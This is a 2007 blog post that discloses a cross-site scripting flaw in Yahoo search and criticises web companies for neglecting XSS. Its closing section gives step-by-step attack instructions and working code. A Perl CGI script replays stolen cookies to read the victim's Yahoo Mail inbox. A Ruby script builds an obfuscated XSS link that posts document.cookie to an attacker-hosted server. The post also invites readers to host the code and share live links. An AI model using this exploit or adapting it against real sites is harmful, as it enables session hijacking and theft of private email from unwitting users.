Thursday, June 14, 2007

Yahoo defect endangers users -- do web sites care?

Summary:
  • Critical cross-site scripting (XSS) defect in Yahoo services is discovered
  • Proof of concept of exploit is included
  • XSS bugs are on the rise because of web 2.0+
  • The web industry is mostly negligent about dealing with XSS

XSS Defects

"I used to act dumb. That act is no longer cute." This is what the re-jailed Paris Hilton said to Barbara Walters from behind penis-painted bars last Sunday. And with these words, Paris demonstrated that she is smarter and has more class than the web sites you have come to rely on every day. This doesn'’t say much about Paris, but it says a hell of a lot about the billion-dollar companies that safeguard your data and identity.

Who else should be putting an end to the dumb act? How about Yahoo, the number one provider of email in the universe, with over 250 million users worldwide?

Every day, hundreds of defects known as "cross-site scripting," or XSS for short, are discovered on web sites every day. (This is not even counting all those that don’t get disclosed.) And the peanut butter eating yahoos in Yahoo’s development organization are not immune to coding up such so-called XSS bugs.

"Cross-site scripting" is the top security risk facing the web today. The biggest danger is that so few web sites actually care enough to guard against it; and those that do care like the big internet companies, e.g. Yahoo, Google, AOL, often make mistakes. And a single mistake can be devastating to vast numbers of users.

XSS Demonstration at Yahoo! Mail

Allow me to demonstrate how dangerous XSS can be. Let’s imagine you’re checking your Yahoo Mail and you see an interesting email, maybe one from a friend of yours or one that peddles medication for the enlargement of your ears. Inside the email is contained an innocuous-looking link that looks like a Yahoo search page, something like http://search.yahoo.com/web/advanced?ei=UTF-8&p=%22%3E.... You click on it... Now why the hell did you do that? You are now screwed.

That’s right: an attacker would now have complete access to your Yahoo account. All because you clicked on one link.

This is not fantasy. The simple code to take over anyone's Yahoo account is included at the bottom fo this article. If you were to visit this naughty link, your web browser would show the last email in your inbox displayed on a web site that is not part of Yahoo. What the simple link does is allow a program to navigate through your email account pretending to be you and download emails onto the attacker’s web site, allowing them to read all your conversations with iheartsanjaya3 you met on myspace.

But that’s not all that could happen. The attacking program could obtain your entire address-book, supplementing spammers'’ lucrative database of spam victims. And thanks to Yahoo’s recent integration of instant messaging within its web-mail site, it could also send instant messages to your friends impersonating you. ("You wanna do what to me?!") Many of your online accounts would then become vulnerable as well, since the attacker would have access to your password-resetting emails; this potentially means access to your financial accounts. All other Yahoo services that you use are also at risk, including Yahoo Photos or Flickr.

Worst of all, the simple act of clicking that link could allow an attacker to automatically send emails or instant messages as you to all your contacts containing the very same link, thus rapidly spreading the attack through your social network in a devastating epidemic known in the industry as a "worm." Within hours, millions of users’ accounts could be compromised.

Web Developer Ignorance and Web Company Complacency

Given how painful a "cross-site scripting" attack can be, its acronym should have been "ASS" instead of "XSS". Yet the developers behind the web applications you use every day often do not know what they are or do not care.

Why don’t web sites care enough? Because on the surface these vulnerabilities do not jeopardize the security of the entire company and such hacks are not as glamorous as high-profile break-ins where millions of social security numbers are stolen. But in reality, an XSS defect can be just as devastating to a site’s user base and extremely traumatic to any single user whose identity and privacy are violated.

Web developers are not keeping up with the increasing risks. While awareness of the risks of XSS and other dangers such as "Cross-Site Request Forgery" (CSRF) is on the rise, there are still many key developers who have never heard of these errors. Blame lack of developer training. The fact is that no developer should be allowed to touch code for a web site without undergoing a thorough education in protecting users from XSS. But the current situation is that web companies assume that their developers are "smart" enough to guard against it. The reality is that this is not a question of smarts, but a question of education and code review process, which are lacking on the web today.

There are a number of disturbing trends that are making the problem worse. The first is the constant push for the integration of many web services behind a single login. Because web conglomerates such as Yahoo and Google offer so many services under one roof, the chance that at any given time someone has left unlocked any of hundreds of doors has reached unacceptable levels. The online privacy and security of users hang precariously on a deck of cards.

The second exacerbating trend is the world of "user-generated content" (UGC). In today’s web 2.0, users are often allowed to generate content for a web site that other users will see. It’s now very easy for hackers to find ways to implant malicious exploits in the pages of innocent viewers.

Yet another trend is that applications are moving from the desktop to the web, as exemplified by Google Docs & Spreadsheets.

Next steps

Will the situation improve? It's up to the web companies to train their web developers and to institute processes to make sure that web application vulnerabilities like XSS and CSRF don't endanger their users.

As for users, your online privacy and security are always at risk. At any given moment, you can lose both, through no fault of yours.

Exploit Code


An attack is frighteningly easy to carry out.


  1. You find a hosting company to run your perl CGI script
  2. You install the code listed below on your web site
  3. You take the address that points to that CGI script and run it through the Ruby script included below in order to generate a link to Yahoo's XSS vulnerability
  4. You send out emails with that link to your best friend, or everyone on Yahoo if you're a loser and have no friends
Note: if you happen to be able to host this script and want to show everyone the proof of concept in action, please post a comment to this article with your generated link to the Yahoo XSS exploit.


Code to be hosted:


#!/usr/bin/perl

use CGI;
use CGI::Carp qw(fatalsToBrowser);
use URI::Escape;
use HTTP::Cookies;
use HTML::Entities;
use LWP::UserAgent;

$q = new CGI;

print "Content-type: text/html\n\n";

$cookies = uri_unescape($q->param('x'));
@cookies = split(/; /, $cookies);

$cj = HTTP::Cookies->new;

foreach $c (@cookies) {
$c =~ /^([^=]+)=(.*)$/;
$k = $1; $v = $2;
$cj->set_cookie('', $k, $v, "/", "yahoo.com");
}

$ua = LWP::UserAgent->new;
$ua->cookie_jar($cj);
$ua->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4');

$r = $ua->simple_request(HTTP::Request->new(GET => "http://mail.yahoo.com/"));
$r->header('Location') =~ /https?:\/\/([^\/]+)/;
$host = $1;

$r = $ua->get("http://$host/ym/ShowFolder?rb=Inbox");
if (!($r->content =~ /<a[^>]+id="folderviewmsg0subjlink"[^>]+href="([^"]+)/is)) {
$url = "http://$host/ws/mail/v1/formrpc?m=ListMessages&appid=YahooMailRC&fid=Inbox&transform-markup=remove-javascript&startMid=0&numMid=300&startInfo=0&numInfo=30&sortKey=date&sortOrder=down";
$r = $ua->get($url);
$r->content =~ /<url>\s*([^>]+)\s*/si;

$r = $ua->get(decode_entities($1));
$r->content =~ /<mid>(.+?)<\/mid>/si;
$mid = $1;
$url = "http://$host/ws/mail/v1/formrpc?m=GetMessage&appid=YahooMailRC&fid=Inbox&message(0)-mid=$mid&message(0)-enableWarnings=true&message(0)-expandCIDReferences=true&message(0)-blockImages=all&truncateAt=1024000&transform-markup=remove-javascript&wssid=yr7G07oSPsarq&amp;r=0.655461233731633";
$r = $ua->get($url);
if ($r->content =~ /<url>\s*([^<]+)\s*/si)
{
$r = $ua->get(decode_entities($1));
}
if ($r->content =~ /<part[^>]+subtype="html"[^<]+<text>(.+?)<\/text/si) {
print decode_entities($1);
} elsif ($r->content =~ /<part[^>]+type="text"[^<]+<text>(.+?)<\/text/si) {
print decode_entities($1);
}
} else {
$r = $ua->get("http://$host$1&PRINT=1");
$r->content =~ /(<div id="message.+?<\/div>)\s*<script>/si;
print $1;
}


Code to generate Yahoo XSS exploit link:


#!/usr/bin/ruby

PATH_TO_CGI_SCRIPT = 'http://yourhostingsite.com/scriptname.cgi'

x = %Q{
f=document.forms[0];f.method='POST';f.action='#{PATH_TO_CGI_SCRIPT}';f.x.value=document.cookie;f.submit()
}

s = %q{http://search.yahoo.com/web/advanced?ei=UTF-8&p=%22%3E%3Cimg%20src=14%20onerror=eval(String.fromCharCode(}
s += x.strip.split(//).map{|s|s[0]}.join(",")
s += %q{))%3E&y=Search&fr=yfp-t-501}

puts s


- Rarely Greys <rarely.greys at (Google's mail)>

ed78040f0e776700f79d918e5be76a0d0b932ec48a1b2c823577b88a9dcf446ee09003a4154e8d9a0d89b3630396136e3100235388c1c7dc51226e4692b2cbfc
Posted by at
Labels: , , , ,

164 comments:

Post a Comment

Subscribe to: Post Comments (Atom)